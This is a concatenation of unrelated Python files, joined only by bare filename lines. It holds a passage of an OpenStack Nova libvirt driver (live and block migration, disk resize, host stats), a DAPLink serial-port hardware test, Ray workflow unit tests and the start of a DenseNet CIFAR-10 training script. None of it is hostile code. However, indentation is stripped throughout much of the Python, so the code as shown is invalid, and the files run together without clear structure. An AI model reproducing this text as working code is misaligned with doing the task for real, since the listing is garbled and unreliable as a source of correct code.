When migrating an instance, we need the filtering rules to
be configured on the destination host before starting the
migration.
Also, when restarting the compute service, we need to ensure
that filtering rules exist for all running services.
"""
if not time_module:
time_module = greenthread
self.firewall_driver.setup_basic_filtering(instance_ref, network_info)
self.firewall_driver.prepare_instance_filter(instance_ref,
network_info)
# nwfilters may be defined in a separate thread in the case
# of libvirt non-blocking mode, so we wait for completion
timeout_count = range(CONF.live_migration_retry_count)
while timeout_count:
if self.firewall_driver.instance_filter_exists(instance_ref,
network_info):
break
timeout_count.pop()
if len(timeout_count) == 0:
msg = _('The firewall filter for %s does not exist')
raise exception.NovaException(msg % instance_ref["name"])
time_module.sleep(1)
def filter_defer_apply_on(self):
self.firewall_driver.filter_defer_apply_on()
def filter_defer_apply_off(self):
self.firewall_driver.filter_defer_apply_off()
def live_migration(self, ctxt, instance_ref, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Spawning live_migration operation for distributing high-load.
:params ctxt: security context
:params instance_ref:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params block_migration: if true, do block migration.
:params migrate_data: implementation specific params
"""
greenthread.spawn(self._live_migration, ctxt, instance_ref, dest,
post_method, recover_method, block_migration,
migrate_data)
def _live_migration(self, ctxt, instance_ref, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
"""Do live migration.
:params ctxt: security context
:params instance_ref:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params migrate_data: implementation specific params
"""
# Do live migration.
try:
if block_migration:
flaglist = CONF.block_migration_flag.split(',')
else:
flaglist = CONF.live_migration_flag.split(',')
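            # The configured flag names are resolved to their libvirt
            # constants and OR'ed together into the single flags value
            # passed to migrateToURI().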
flagvals = [getattr(libvirt, x.strip()) for x in flaglist]
logical_sum = reduce(lambda x, y: x | y, flagvals)
dom = self._lookup_by_name(instance_ref["name"])
dom.migrateToURI(CONF.live_migration_uri % dest,
logical_sum,
None,
CONF.live_migration_bandwidth)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Live Migration failure: %(e)s") % locals(),
instance=instance_ref)
recover_method(ctxt, instance_ref, dest, block_migration)
# Waiting for completion of live_migration.
timer = utils.FixedIntervalLoopingCall(f=None)
def wait_for_live_migration():
"""waiting for live migration completion."""
try:
self.get_info(instance_ref)['state']
except exception.NotFound:
timer.stop()
post_method(ctxt, instance_ref, dest, block_migration,
migrate_data)
timer.f = wait_for_live_migration
timer.start(interval=0.5).wait()
def _fetch_instance_kernel_ramdisk(self, context, instance):
"""Download kernel and ramdisk for instance in instance directory."""
instance_dir = libvirt_utils.get_instance_path(instance)
if instance['kernel_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir, 'kernel'),
instance['kernel_id'],
instance['user_id'],
instance['project_id'])
if instance['ramdisk_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir,
'ramdisk'),
instance['ramdisk_id'],
instance['user_id'],
instance['project_id'])
def pre_live_migration(self, context, instance_ref, block_device_info,
network_info, migrate_data=None):
"""Preparation live migration."""
# Steps for volume backed instance live migration w/o shared storage.
is_shared_storage = True
is_volume_backed = False
is_block_migration = True
if migrate_data:
is_shared_storage = migrate_data.get('is_shared_storage', True)
is_volume_backed = migrate_data.get('is_volume_backed', False)
is_block_migration = migrate_data.get('block_migration', True)
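        # Only volume-backed instances migrated without shared storage and
        # without block migration need their instance directory created
        # here; in the other cases the directory either already exists on
        # shared storage or is created by pre_block_migration().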
if is_volume_backed and not (is_block_migration or is_shared_storage):
# Create the instance directory on destination compute node.
instance_dir = libvirt_utils.get_instance_path(instance_ref)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
# Touch the console.log file, required by libvirt.
console_file = self._get_console_log_path(instance_ref)
libvirt_utils.file_open(console_file, 'a').close()
        # If the image has a kernel and ramdisk, download them in the
        # normal way.
self._fetch_instance_kernel_ramdisk(context, instance_ref)
# Establishing connection to volume server.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
self.volume_driver_method('connect_volume',
connection_info,
disk_info)
# We call plug_vifs before the compute manager calls
# ensure_filtering_rules_for_instance, to ensure bridge is set up
        # Retrying is necessary because requests arrive continuously;
        # concurrent requests to iptables make it complain.
max_retry = CONF.live_migration_retry_count
for cnt in range(max_retry):
try:
self.plug_vifs(instance_ref, network_info)
break
except exception.ProcessExecutionError:
if cnt == max_retry - 1:
raise
else:
                    LOG.warn(_("plug_vifs() failed %(cnt)d. "
                               "Retry up to %(max_retry)d for %(hostname)s.")
% locals())
greenthread.sleep(1)
def pre_block_migration(self, ctxt, instance, disk_info_json):
"""Preparation for block migration."""
# NOTE (rmk): When preparing for a block migration, the instance dir
# should not exist on the destination hypervisor.
instance_dir = libvirt_utils.get_instance_path(instance)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
self._create_images_and_backing(ctxt, instance, disk_info_json)
def _create_images_and_backing(self, ctxt, instance, disk_info_json):
"""
:params ctxt: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params disk_info_json:
json strings specified in get_instance_disk_info
"""
disk_info = jsonutils.loads(disk_info_json)
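        # disk_info has the format produced by get_instance_disk_info() below:
        # a list of dicts with 'path', 'type', 'virt_disk_size', 'backing_file'
        # and 'disk_size' keys.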
instance_dir = libvirt_utils.get_instance_path(instance)
for info in disk_info:
base = os.path.basename(info['path'])
# Get image type and create empty disk image, and
# create backing file in case of qcow2.
instance_disk = os.path.join(instance_dir, base)
if not info['backing_file'] and not os.path.exists(instance_disk):
libvirt_utils.create_image(info['type'], instance_disk,
info['disk_size'])
else:
                # Creating the backing file follows the same path as spawning
                # an instance.
cache_name = os.path.basename(info['backing_file'])
# Remove any size tags which the cache manages
cache_name = cache_name.split('_')[0]
image = self.image_backend.image(instance,
instance_disk,
CONF.libvirt_images_type)
image.cache(fetch_func=libvirt_utils.fetch_image,
context=ctxt,
filename=cache_name,
image_id=instance['image_ref'],
user_id=instance['user_id'],
project_id=instance['project_id'],
size=info['virt_disk_size'])
        # If the image has a kernel and ramdisk, just download them
        # the normal way.
self._fetch_instance_kernel_ramdisk(ctxt, instance)
def post_live_migration_at_destination(self, ctxt,
instance_ref,
network_info,
block_migration,
block_device_info=None):
"""Post operation of live migration at destination host.
:param ctxt: security context
:param instance_ref:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param network_info: instance network information
        :param block_migration: if true, post operation of block_migration.
"""
# Define migrated instance, otherwise, suspend/destroy does not work.
dom_list = self._conn.listDefinedDomains()
if instance_ref["name"] not in dom_list:
# In case of block migration, destination does not have
# libvirt.xml
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance_ref)
self.to_xml(instance_ref, network_info, disk_info,
block_device_info, write_to_disk=True)
            # libvirt.xml should be generated by to_xml(), but libvirt will not
            # accept the to_xml() result directly because it does not include
            # the instance uuid.
dom = self._lookup_by_name(instance_ref["name"])
self._conn.defineXML(dom.XMLDesc(0))
def get_instance_disk_info(self, instance_name, xml=None):
"""Preparation block migration.
        :params instance_name:
            name of the instance that is migrated.
:return:
json strings with below format::
"[{'path':'disk', 'type':'raw',
'virt_disk_size':'10737418240',
'backing_file':'backing_file',
'disk_size':'83886080'},...]"
"""
# NOTE (rmk): Passing the domain XML into this function is optional.
# When it is not passed, we attempt to extract it from
# the pre-existing definition.
if xml is None:
try:
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
msg = _("Error from libvirt while getting description of "
"%(instance_name)s: [Error Code %(error_code)s] "
"%(ex)s") % locals()
LOG.warn(msg)
raise exception.InstanceNotFound(instance_id=instance_name)
disk_info = []
doc = etree.fromstring(xml)
disk_nodes = doc.findall('.//devices/disk')
path_nodes = doc.findall('.//devices/disk/source')
driver_nodes = doc.findall('.//devices/disk/driver')
for cnt, path_node in enumerate(path_nodes):
disk_type = disk_nodes[cnt].get('type')
path = path_node.get('file')
if disk_type != 'file':
LOG.debug(_('skipping %(path)s since it looks like volume') %
locals())
continue
# get the real disk size or
# raise a localized error if image is unavailable
dk_size = int(os.path.getsize(path))
disk_type = driver_nodes[cnt].get('type')
if disk_type == "qcow2":
backing_file = libvirt_utils.get_disk_backing_file(path)
virt_size = disk.get_disk_size(path)
else:
backing_file = ""
virt_size = 0
disk_info.append({'type': disk_type,
'path': path,
'virt_disk_size': virt_size,
'backing_file': backing_file,
'disk_size': dk_size})
return jsonutils.dumps(disk_info)
def get_disk_over_committed_size_total(self):
"""Return total over committed disk size for all instances."""
        # Disk size over-committed by each instance: virt_disk_size - disk_size
instances_name = self.list_instances()
disk_over_committed_size = 0
for i_name in instances_name:
try:
disk_infos = jsonutils.loads(
self.get_instance_disk_info(i_name))
for info in disk_infos:
i_vt_sz = int(info['virt_disk_size'])
i_dk_sz = int(info['disk_size'])
disk_over_committed_size += i_vt_sz - i_dk_sz
except OSError as e:
if e.errno == errno.ENOENT:
LOG.error(_("Getting disk size of %(i_name)s: %(e)s") %
locals())
else:
raise
except exception.InstanceNotFound:
# Instance was deleted during the check so ignore it
pass
            # NOTE(gtt116): give other tasks a chance to run.
greenthread.sleep(0)
return disk_over_committed_size
def unfilter_instance(self, instance_ref, network_info):
"""See comments of same method in firewall_driver."""
self.firewall_driver.unfilter_instance(instance_ref,
network_info=network_info)
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
        If 'refresh' is True, update the stats first."""
return self.host_state.get_host_stats(refresh=refresh)
def get_host_uptime(self, host):
"""Returns the result of calling "uptime"."""
#NOTE(dprince): host seems to be ignored for this call and in
# other compute drivers as well. Perhaps we should remove it?
out, err = utils.execute('env', 'LANG=C', 'uptime')
return out
def manage_image_cache(self, context, all_instances):
"""Manage the local cache of images."""
self.image_cache_manager.verify_base_images(context, all_instances)
def _cleanup_remote_migration(self, dest, inst_base, inst_base_resize):
"""Used only for cleanup in case migrate_disk_and_power_off fails."""
try:
if os.path.exists(inst_base_resize):
utils.execute('rm', '-rf', inst_base)
utils.execute('mv', inst_base_resize, inst_base)
utils.execute('ssh', dest, 'rm', '-rf', inst_base)
except Exception:
pass
def migrate_disk_and_power_off(self, context, instance, dest,
instance_type, network_info,
block_device_info=None):
LOG.debug(_("Starting migrate_disk_and_power_off"),
instance=instance)
disk_info_text = self.get_instance_disk_info(instance['name'])
disk_info = jsonutils.loads(disk_info_text)
self.power_off(instance)
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
        # copy disks to destination
        # rename the instance dir with a "_resize" suffix first, so this also
        # works when the instance dir is on shared storage (e.g. NFS).
same_host = (dest == self.get_host_ip_addr())
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
try:
utils.execute('mv', inst_base, inst_base_resize)
if same_host:
dest = None
utils.execute('mkdir', '-p', inst_base)
else:
utils.execute('ssh', dest, 'mkdir', '-p', inst_base)
for info in disk_info:
# assume inst_base == dirname(info['path'])
img_path = info['path']
fname = os.path.basename(img_path)
from_path = os.path.join(inst_base_resize, fname)
if info['type'] == 'qcow2' and info['backing_file']:
tmp_path = from_path + "_rbase"
# merge backing file
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'qcow2', from_path, tmp_path)
if same_host:
utils.execute('mv', tmp_path, img_path)
else:
libvirt_utils.copy_image(tmp_path, img_path, host=dest)
utils.execute('rm', '-f', tmp_path)
else: # raw or qcow2 with no backing file
libvirt_utils.copy_image(from_path, img_path, host=dest)
except Exception:
with excutils.save_and_reraise_exception():
self._cleanup_remote_migration(dest, inst_base,
inst_base_resize)
return disk_info_text
def _wait_for_running(self, instance):
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance running successfully."), instance=instance)
raise utils.LoopingCallDone()
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None):
LOG.debug(_("Starting finish_migration"), instance=instance)
# resize disks. only "disk" and "disk.local" are necessary.
disk_info = jsonutils.loads(disk_info)
for info in disk_info:
fname = os.path.basename(info['path'])
if fname == 'disk':
size = instance['root_gb']
elif fname == 'disk.local':
size = instance['ephemeral_gb']
else:
size = 0
size *= 1024 * 1024 * 1024
            # If we have a non-partitioned image that we can extend,
            # then ensure we're in 'raw' format so we can extend the file system.
fmt = info['type']
if (size and fmt == 'qcow2' and
disk.can_resize_fs(info['path'], size, use_cow=True)):
path_raw = info['path'] + '_raw'
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'raw', info['path'], path_raw)
utils.execute('mv', path_raw, info['path'])
fmt = 'raw'
if size:
disk.extend(info['path'], size)
if fmt == 'raw' and CONF.use_cow_images:
# back to qcow2 (no backing_file though) so that snapshot
# will be available
path_qcow = info['path'] + '_qcow'
utils.execute('qemu-img', 'convert', '-f', 'raw',
'-O', 'qcow2', info['path'], path_qcow)
utils.execute('mv', path_qcow, info['path'])
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info,
image_meta)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info)
        # assume _create_image does nothing if a target file exists.
# TODO(oda): injecting files is not necessary
self._create_image(context, instance, xml,
disk_mapping=disk_info['mapping'],
network_info=network_info,
block_device_info=None)
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
timer = utils.FixedIntervalLoopingCall(self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def _cleanup_failed_migration(self, inst_base):
"""Make sure that a failed migrate doesn't prevent us from rolling
back in a revert."""
shutil.rmtree(inst_base)
def finish_revert_migration(self, instance, network_info,
block_device_info=None):
LOG.debug(_("Starting finish_revert_migration"),
instance=instance)
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
# NOTE(danms): if we're recovering from a failed migration,
# make sure we don't have a left-over same-host base directory
# that would conflict. Also, don't fail on the rename if the
# failure happened early.
if os.path.exists(inst_base_resize):
if os.path.exists(inst_base):
self._cleanup_failed_migration(inst_base)
utils.execute('mv', inst_base_resize, inst_base)
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info)
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
timer = utils.FixedIntervalLoopingCall(self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
self._cleanup_resize(instance, network_info)
def get_diagnostics(self, instance):
def get_io_devices(xml_doc):
"""get the list of io devices from the xml document."""
result = {"volumes": [], "ifaces": []}
try:
doc = etree.fromstring(xml_doc)
except Exception:
return result
blocks = [('./devices/disk', 'volumes'),
('./devices/interface', 'ifaces')]
for block, key in blocks:
section = doc.findall(block)
for node in section:
for child in node.getchildren():
if child.tag == 'target' and child.get('dev'):
result[key].append(child.get('dev'))
return result
domain = self._lookup_by_name(instance['name'])
output = {}
# get cpu time, might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
cputime = domain.vcpus()[0]
for i in range(len(cputime)):
output["cpu" + str(i) + "_time"] = cputime[i][2]
except libvirt.libvirtError:
pass
# get io status
xml = domain.XMLDesc(0)
dom_io = get_io_devices(xml)
for disk in dom_io["volumes"]:
try:
# blockStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.blockStats(disk)
output[disk + "_read_req"] = stats[0]
output[disk + "_read"] = stats[1]
output[disk + "_write_req"] = stats[2]
output[disk + "_write"] = stats[3]
output[disk + "_errors"] = stats[4]
except libvirt.libvirtError:
pass
for interface in dom_io["ifaces"]:
try:
# interfaceStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.interfaceStats(interface)
output[interface + "_rx"] = stats[0]
output[interface + "_rx_packets"] = stats[1]
output[interface + "_rx_errors"] = stats[2]
output[interface + "_rx_drop"] = stats[3]
output[interface + "_tx"] = stats[4]
output[interface + "_tx_packets"] = stats[5]
output[interface + "_tx_errors"] = stats[6]
output[interface + "_tx_drop"] = stats[7]
except libvirt.libvirtError:
pass
output["memory"] = domain.maxMemory()
# memoryStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
mem = domain.memoryStats()
for key in mem.keys():
output["memory-" + key] = mem[key]
except (libvirt.libvirtError, AttributeError):
pass
return output
def add_to_aggregate(self, context, aggregate, host, **kwargs):
"""Add a compute host to an aggregate."""
#NOTE(jogo) Currently only used for XenAPI-Pool
pass
def remove_from_aggregate(self, context, aggregate, host, **kwargs):
"""Remove a compute host from an aggregate."""
pass
def undo_aggregate_operation(self, context, op, aggregate,
host, set_error=True):
"""only used for Resource Pools."""
pass
def instance_on_disk(self, instance):
# ensure directories exist and are writable
instance_path = libvirt_utils.get_instance_path(instance)
        LOG.debug(_('Checking instance files accessibility: '
                    '%(instance_path)s')
% locals())
return os.access(instance_path, os.W_OK)
def inject_network_info(self, instance, nw_info):
self.firewall_driver.setup_basic_filtering(instance, nw_info)
class HostState(object):
"""Manages information about the compute node through libvirt."""
def __init__(self, driver):
super(HostState, self).__init__()
self._stats = {}
self.driver = driver
self.update_status()
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
        If 'refresh' is True, update the stats first."""
if refresh:
self.update_status()
return self._stats
def update_status(self):
"""Retrieve status info from libvirt."""
LOG.debug(_("Updating host stats"))
data = {}
data["vcpus"] = self.driver.get_vcpu_total()
data["vcpus_used"] = self.driver.get_vcpu_used()
data["cpu_info"] = jsonutils.loads(self.driver.get_cpu_info())
disk_info_dict = self.driver.get_local_gb_info()
data["disk_total"] = disk_info_dict['total']
data["disk_used"] = disk_info_dict['used']
data["disk_available"] = disk_info_dict['free']
data["host_memory_total"] = self.driver.get_memory_mb_total()
data["host_memory_free"] = (data["host_memory_total"] -
self.driver.get_memory_mb_used())
data["hypervisor_type"] = self.driver.get_hypervisor_type()
data["hypervisor_version"] = self.driver.get_hypervisor_version()
data["hypervisor_hostname"] = self.driver.get_hypervisor_hostname()
data["supported_instances"] = \
self.driver.get_instance_capabilities()
self._stats = data
return data
|
serial_test.py
|
#
# DAPLink Interface Firmware
# Copyright (c) 2009-2016, ARM Limited, All Rights Reserved
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from __future__ import division
import Queue
import functools
import serial
import threading
import time
ERROR_TIMEOUT_SECONDS = 10.0
def _same(d1, d2):
d1 = bytearray(d1)
d2 = bytearray(d2)
for i in range(min(len(d1), len(d2))):
if d1[i] != d2[i]:
return False
if len(d1) != len(d2):
return False
return True
# http://digital.ni.com/public.nsf/allkb/D37754FFA24F7C3F86256706005B9BE7
standard_baud = [
9600,
14400,
19200,
28800,
38400,
#56000, #TODO - uncomment once daplink-validation supports 56000 on nrf5x
57600,
115200,
]
timing_test_baud = standard_baud[3:]
def calc_timeout(length, baud):
"""Calculate a timeout given the data and baudrate
Positional arguments:
length - size of data to be sent
baud - baud rate to send data
Calculate a reasonable timeout given the supplied parameters.
    This function adds slightly more time than is needed, to account
    for latency and various configurations.
"""
return 12 * float(length) / float(baud) + 0.2
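# Worked example (illustrative, not part of the test): sending a 4096-byte
# block at 115200 baud gives 12 * 4096 / 115200 + 0.2 ~= 0.43 + 0.2 ~= 0.63 s,
# comfortably above the ~0.36 s a raw 10-bits-per-byte transfer would take.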
class SerialTester(object):
"""Helper object to buffer serial and setup baud"""
def __init__(self, port):
        self.raw_serial = serial.Serial(port=port,
                                        bytesize=serial.EIGHTBITS,
                                        parity=serial.PARITY_NONE,
                                        stopbits=serial.STOPBITS_ONE,
                                        timeout=None,
                                        xonxoff=False,
                                        rtscts=False,
                                        write_timeout=None,
                                        dsrdtr=False,
                                        inter_byte_timeout=None,
                                        exclusive=None)
self.raw_serial.write_timeout = ERROR_TIMEOUT_SECONDS
self._queue = Queue.Queue()
self._write_thread = threading.Thread(target=self._serial_main)
self._write_thread.start()
def __enter__(self):
return self
def __exit__(self, exception_type, value, traceback):
self._queue.put(None)
self._write_thread.join(ERROR_TIMEOUT_SECONDS)
assert not self._write_thread.isAlive(), "Thread join failed"
self.raw_serial.close()
self.raw_serial = None
return False
def new_session_with_baud(self, baud, parent_test):
"""Start a new session by restarting target and setting baud"""
test_info = parent_test.create_subtest("Set Baud")
# Set baud to 115200
self.raw_serial.baudrate = 115200
self.raw_serial.timeout = 1.0
# Reset the target
self.raw_serial.reset_output_buffer()
self.raw_serial.reset_input_buffer()
self.raw_serial.sendBreak()
# Wait until the target is initialized
expected_resp = "{init}"
resp = self.read(len(expected_resp))
if not _same(resp, expected_resp):
test_info.failure("Fail on init: %s" % resp)
return False
# Change baudrate to that of the first test
command = "{baud:%i}" % baud
self.write(command)
resp = self.read(len(command))
if not _same(resp, command):
test_info.failure("Fail on baud command: %s" % resp)
return False
# Update baud of local serial port
self.raw_serial.baudrate = baud
# Read the response indicating that the baudrate
# on the target has changed
expected_resp = "{change}"
resp = self.read(len(expected_resp))
if not _same(resp, expected_resp):
test_info.failure("Fail on baud change %s" % resp)
return False
# Set default timeout
self.raw_serial.timeout = ERROR_TIMEOUT_SECONDS
# Success
return True
def read(self, length):
"""Read serial data"""
return self.raw_serial.read(length)
def write(self, data):
"""Write serial port data in the background"""
func = functools.partial(self.raw_serial.write, data[:])
self._queue.put(func)
def set_read_timeout(self, timeout):
"""Set timeout for read operations"""
assert self._queue.empty(), "Queue must be empty to change timeout"
self.raw_serial.timeout = timeout
def flush(self):
"""Wait for all writes to complete"""
self._queue.join()
assert self._queue.empty()
def _serial_main(self):
"""Write helper thread"""
while True:
task = self._queue.get(True)
if task is None:
self._queue.task_done()
# End of processing is an empty task
break
try:
task()
except serial.SerialTimeoutException:
pass
self._queue.task_done()
def test_serial(workspace, parent_test):
"""Test the serial port endpoint
Requirements:
-daplink-validation must be loaded for the target.
Positional arguments:
    workspace - workspace object providing the board under test
    parent_test - parent test object used to create the serial subtest
Return:
True if the test passed, False otherwise
"""
test_info = parent_test.create_subtest("Serial test")
board = workspace.board
port = board.get_serial_port()
test_info.info("Testing serial port %s" % port)
# Note: OSX sends a break command when a serial port is closed.
# To avoid problems while testing keep the serial port open the
# whole time. Use the property 'baudrate' to change the baud
# instead of opening a new instance.
with SerialTester(port) as sp:
# Generate a 4KB block of dummy data
# and test supported baud rates
test_data = [i for i in range(0, 256)] * 4 * 4
test_data = str(bytearray(test_data))
for baud in standard_baud:
test_info.info("Testing baud %i" % baud)
success = sp.new_session_with_baud(baud, test_info)
if not success:
test_info.failure("Unable to setup session")
continue
# Perform test
sp.write(test_data)
resp = sp.read(len(test_data))
resp = bytearray(resp)
if _same(test_data, resp):
test_info.info("Pass")
else:
test_info.failure("Fail on baud %s" % baud)
# Timing stress test - send data at critical points
# in time like right as the transmitter is turned off
# ------------------
# Test sequence
# 1. Send a block of data (vary size for the test)
# 2. Wait until 1 byte is read back
# 3. Write 1 byte
# 4. Read back all data
test_data = [i for i in range(0, 256)] * 4 * 4
test_data = str(bytearray(test_data))
for baud in timing_test_baud:
test_info.info("Timing test baud %i" % baud)
success = sp.new_session_with_baud(baud, test_info)
if not success:
test_info.failure("Unable to setup session")
continue
test_pass = True
for data_size in range(1, 10):
data = test_data[0:data_size + 1]
for _ in range(0, 1000):
resp = bytearray()
sp.write(data[0:data_size])
resp += sp.read(1)
sp.write(data[-1:])
resp += sp.read(data_size)
sp.flush()
if not _same(data, resp):
test_pass = False
test_info.info("fail size - %s" % data_size)
break
if test_pass:
test_info.info("Pass")
else:
test_info.failure("Fail on timing test with baud %s"
% baud)
        # Settings change smoke test - reconfigure settings while
        # in the middle of a transfer and verify nothing bad happens
test_data = [i for i in range(0, 128)]
test_data = str(bytearray(test_data))
sp.new_session_with_baud(115200, test_info)
sp.set_read_timeout(0)
for baud in standard_baud:
sp.raw_serial.baudrate = baud
sp.write(test_data)
xfer_time = float(len(test_data) * 10) / float(baud)
time.sleep(xfer_time / 2)
# Discard data
sp.read(1024)
# Read any leftover data
sp.flush()
sp.raw_serial.baudrate = 115200
sp.set_read_timeout(1.0)
sp.read(128 * len(standard_baud))
# Generate a 8 KB block of dummy data
# and test a large block transfer
test_data = [i for i in range(0, 256)] * 4 * 8
test_data = str(bytearray(test_data))
sp.new_session_with_baud(115200, test_info)
sp.write(test_data)
resp = sp.read(len(test_data))
if _same(resp, test_data):
test_info.info("Block test passed")
else:
test_info.failure("Block test failed")
# Refresh to check for asserts
board.refresh(test_info)
|
test_basic_workflows_3.py
|
import pytest
from filelock import FileLock
from pathlib import Path
import ray
from ray import workflow
from ray.tests.conftest import * # noqa
def test_wf_run(workflow_start_regular, tmp_path):
counter = tmp_path / "counter"
counter.write_text("0")
@ray.remote
def f():
v = int(counter.read_text()) + 1
counter.write_text(str(v))
workflow.create(f.bind()).run("abc")
assert counter.read_text() == "1"
# This will not rerun the job from beginning
workflow.create(f.bind()).run("abc")
assert counter.read_text() == "1"
def test_wf_no_run():
# workflow should be able to run without explicit init
ray.shutdown()
@ray.remote
def f1():
pass
f1.bind()
@ray.remote
def f2(*w):
pass
f = workflow.create(f2.bind(*[f1.bind() for _ in range(10)]))
f.run()
def test_dedupe_indirect(workflow_start_regular, tmp_path):
counter = Path(tmp_path) / "counter.txt"
lock = Path(tmp_path) / "lock.txt"
counter.write_text("0")
@ray.remote
def incr():
with FileLock(str(lock)):
c = int(counter.read_text())
c += 1
counter.write_text(f"{c}")
@ray.remote
def identity(a):
return a
@ray.remote
def join(*a):
return counter.read_text()
# Here a is passed to two steps and we need to ensure
# it's only executed once
a = incr.bind()
i1 = identity.bind(a)
i2 = identity.bind(a)
assert "1" == workflow.create(join.bind(i1, i2)).run()
assert "2" == workflow.create(join.bind(i1, i2)).run()
# pass a multiple times
assert "3" == workflow.create(join.bind(a, a, a, a)).run()
assert "4" == workflow.create(join.bind(a, a, a, a)).run()
def test_run_off_main_thread(workflow_start_regular):
@ray.remote
def fake_data(num: int):
return list(range(num))
succ = False
# Start new thread here ⚠️
def run():
global succ
# Setup the workflow.
data = workflow.create(fake_data.bind(10))
assert data.run(workflow_id="run") == list(range(10))
import threading
t = threading.Thread(target=run)
t.start()
t.join()
assert workflow.get_status("run") == workflow.SUCCESSFUL
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
|
train_test.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Trains and tests a DenseNet on CIFAR-10.
For usage information, call with --help.
Author: Jan Schlüter
"""
import os
from argparse import ArgumentParser
from functions_0 import *
def opts_parser():
usage = "Trains and tests a DenseNet on CIFAR-10."
parser = ArgumentParser(description=usage)
parser.add_argument(
'-L', '--depth', type=int, default=40,
help='Network depth in layers (default: %(default)s)')
parser.add_argument(
'-k', '--growth-rate', type=int, default=12,
help='Growth rate in dense blocks (default: %(default)s)')
parser.add_argument(
'--dropout', type=float, default=0,
help='Dropout rate (default: %(default)s)')
parser.add_argument(
'--augment', action='store_true', default=True,
help='Perform data augmentation (enabled by default)')
parser.add_argument(
'--no-augment', action='store_false', dest='augment',
help='Disable data augmentation')
parser.add_argument(
'--validate', action='store_true', default=False,
help='Perform validation on validation set (disabled by default)')
parser.add_argument(
'--no-validate', action='store_false', dest='validate',
help='Disable validation')
parser.add_argument(
'--validate-test', action='store_const', dest='validate',
const='test', help='Perform validation on test set')
parser.add_argument(
'--epochs', type=int, default=300,
help='Number of training epochs (default: %(default)s)')
parser.add_argument(
'--eta', type=float, default=0.1,
help='Initial learning rate (default: %(default)s)')
parser.add_argument(
'--save-weights', type=str, default=None, metavar='FILE',
help='If given, save network weights to given .npz file')
parser.add_argument(
'--save-errors', type=str, default=None, metavar='FILE',
help='If given, save train/validation errors to given .npz file')
return parser
def generate_in_background(generator, num_cached=10):
"""
Runs a generator in a background thread, caching up to `num_cached` items.
"""
import Queue
queue = Queue.Queue(maxsize=num_cached)
sentinel = object() # guaranteed unique reference
# define producer (putting items into queue)
def producer():
for item in generator:
queue.put(item)
queue.put(sentinel)
# start producer (in a background thread)
import threading
thread = threading.Thread(target=producer)
thread.daemon = True
thread.start()
# run as consumer (read items from queue, in current thread)
item = queue.get()
while item is not sentinel:
yield item
item = queue.get()
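# Illustrative usage of generate_in_background (a minimal sketch; the names
# below are hypothetical and not part of this script). The consumer loop is
# unchanged while items are prepared ahead of time in a background thread:
#
#     import time
#     def slow_batches():
#         for i in range(3):
#             time.sleep(0.1)  # simulate slow, I/O-bound batch preparation
#             yield i
#
#     for item in generate_in_background(slow_batches(), num_cached=2):
#         print(item)  # items arrive while the producer keeps running ahead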
